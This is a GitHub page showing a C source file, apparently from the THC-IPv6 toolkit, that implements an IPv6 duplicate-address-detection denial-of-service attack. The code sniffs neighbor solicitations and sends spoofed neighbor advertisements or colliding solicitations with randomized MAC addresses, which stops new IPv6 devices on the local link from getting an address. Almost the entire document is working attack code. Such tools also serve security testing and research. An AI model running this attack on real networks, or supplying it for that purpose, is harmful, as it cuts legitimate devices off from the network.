-
Notifications
You must be signed in to change notification settings - Fork 218
/
dos-new-ip6.c
197 lines (172 loc) · 5.96 KB
/
dos-new-ip6.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <time.h>
#include <pcap.h>
#include "thc-ipv6.h"
unsigned char *pkt = NULL, *dstmac, *dst, matchfoo[16];
int pkt_len = 0;
thc_ipv6_hdr * ipv6;
int mychecksum, do_solicit = 0;
char * interface;
char * ptr3, *ptr4;
int i;
unsigned char *ownmac;
void help(char *prg) {
printf("%s %s (c) 2022 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
printf("Syntax: %s [-S] interface\n\n", prg);
printf(
"This tools prevents new IPv6 interfaces to come up, by sending answers "
"to\n");
printf(
"duplicate ip6 checks (DAD). This results in a DOS for new IPv6 "
"devices.\n\n");
printf(
"Option -S sends conflicting NS query instead of NA reply, but it "
"restricts\n");
printf("source randomization.\n\n");
exit(-1);
}
void intercept(u_char *foo, const struct pcap_pkthdr *header,
const unsigned char *data) {
unsigned char *ipv6hdr = (unsigned char *)(data + 14);
int len = header->caplen - 14;
if (do_hdr_size) {
ipv6hdr = (unsigned char *)(data + do_hdr_size);
len = header->caplen - do_hdr_size;
if ((ipv6hdr[0] & 240) != 0x60) return;
}
if (debug) {
printf("DEBUG: packet received\n");
thc_dump_data((unsigned char *)data, header->caplen, "Received Packet");
}
if ((do_solicit == 1) && (memcmp(data + 6, ipv6->pkt + 6, 6) == 0)) {
// found a looped back own NS packet, ignore it
return;
}
if (ipv6hdr[6] != NXT_ICMP6 || ipv6hdr[40] != ICMP6_NEIGHBORSOL ||
header->caplen < 78)
return;
if (memcmp(matchfoo, ipv6hdr + 8, 16) != 0 &&
!(ipv6hdr[8] == 0xfe && ipv6hdr[48] != 0xfe))
return;
if (debug)
printf(
"DEBUG: packet is a valid duplicate ip6 check via icmp6 neighbor "
"solitication\n");
if (do_solicit == 0) {
memcpy(ipv6->pkt + 22, ipv6hdr + 48, 16); // copy target to srcip6
memcpy(ipv6->pkt + 62, ipv6hdr + 48, 16); // copy target to target
mychecksum = checksum_pseudo_header(ipv6->pkt + 22, ipv6->pkt + 38,
NXT_ICMP6, ipv6->pkt + 54, 32);
ipv6->pkt[56] = mychecksum / 256;
ipv6->pkt[57] = mychecksum % 256;
} else {
memset(ipv6->pkt + 22, 0, 16); // set srcIP as ::
memcpy(ipv6->pkt + 62, ipv6hdr + 48, 16); // copy target to target
memcpy(ipv6->pkt + 3, ipv6hdr + 61, 3); // make tail of L2 mcast
memcpy(ipv6->pkt + 51, ipv6hdr + 61, 3); // make tail of all node mcast
mychecksum = checksum_pseudo_header(ipv6->pkt + 22, ipv6->pkt + 38,
NXT_ICMP6, ipv6->pkt + 54, 24);
ipv6->pkt[56] = mychecksum / 256;
ipv6->pkt[57] = mychecksum % 256;
}
thc_send_pkt(interface, pkt, &pkt_len);
if (do_solicit == 0) {
ptr4 = thc_ipv62notation(ipv6->pkt + 22);
printf("Spoofed packet for existing ip6 as %s\n", ptr4);
free(ptr4);
} else {
ptr4 = thc_ipv62notation(ipv6->pkt + 62);
printf("Spoofed packet for colliding NS query as %s\n", ptr4);
free(ptr4);
}
if (fork() == 0) {
usleep(200);
debug = 0;
thc_send_pkt(interface, pkt, &pkt_len);
exit(0);
}
ipv6->pkt[56] = 0;
ipv6->pkt[57] = 0;
// new random mac for next duplicate check
// but it will not create if -S option is set
if (do_solicit == 0) {
for (i = 2; i < 6; i++)
ipv6->pkt[6 + i] = rand() % 256;
memcpy(ipv6->pkt + 80, ipv6->pkt + 6, 6);
}
(void)wait3(NULL, WNOHANG, NULL);
return;
}
int main(int argc, char *argv[]) {
char dummy[24];
if (argc == 3 && strncmp(argv[1], "-d", 2) == 0) {
argv++;
argc--;
debug = 1;
}
if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]);
if (debug) printf("Preparing spoofed packet for speed-up\n");
while ((i = getopt(argc, argv, "S")) >= 0) {
switch (i) {
case 'S':
do_solicit = 1;
break;
default:
fprintf(stderr, "Error: invalid option %c\n", i);
help(argv[0]);
exit(-1);
}
}
if (argc - optind < 1) help(argv[0]);
interface = argv[optind];
if ((ownmac = thc_get_own_mac(interface)) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
memset(dummy, 'X', sizeof(dummy));
dummy[16] = 2;
dummy[17] = 1;
memcpy(&dummy[18], ownmac, 6);
if (do_solicit == 0) { // intercept by NA
dst = thc_resolve6("ff02::1");
dstmac = thc_get_multicast_mac(dst);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, dummy,
dst, 255, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0,
ICMP6_NEIGHBORADV_OVERRIDE, dummy, 24, 0) < 0)
return -1;
if (thc_generate_pkt(interface, ownmac, dstmac, pkt, &pkt_len) < 0)
return -1;
} else { // intercept by NS
dst = thc_resolve6("ff02::1:ff00:0");
dstmac = thc_get_multicast_mac(dst);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, dummy,
dst, 255, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORSOL, 0, 0, dummy, 16, 0) < 0)
return -1;
if (thc_generate_pkt(interface, ownmac, dstmac, pkt, &pkt_len) < 0)
return -1;
}
ipv6 = (thc_ipv6_hdr *)pkt;
memset(ipv6->pkt + 56, 0, 2); // reset checksum to zero
srand(time(NULL) + getpid());
for (i = 2; i < 6; i++) // set a random mac, keeping the first two bytes
ipv6->pkt[6 + i] = rand() % 256;
memcpy(ipv6->pkt + 80, ipv6->pkt + 6, 6);
if (debug) {
thc_dump_data(ipv6->pkt, ipv6->pkt_len, "Prepared spoofing packet");
printf("\n");
}
memset(matchfoo, 0, sizeof(matchfoo));
printf("Started ICMP6 DAD Denial-of-Service (Press Control-C to end) ...\n");
return thc_pcap_function(interface, "icmp6", (char *)intercept, 1, NULL);
}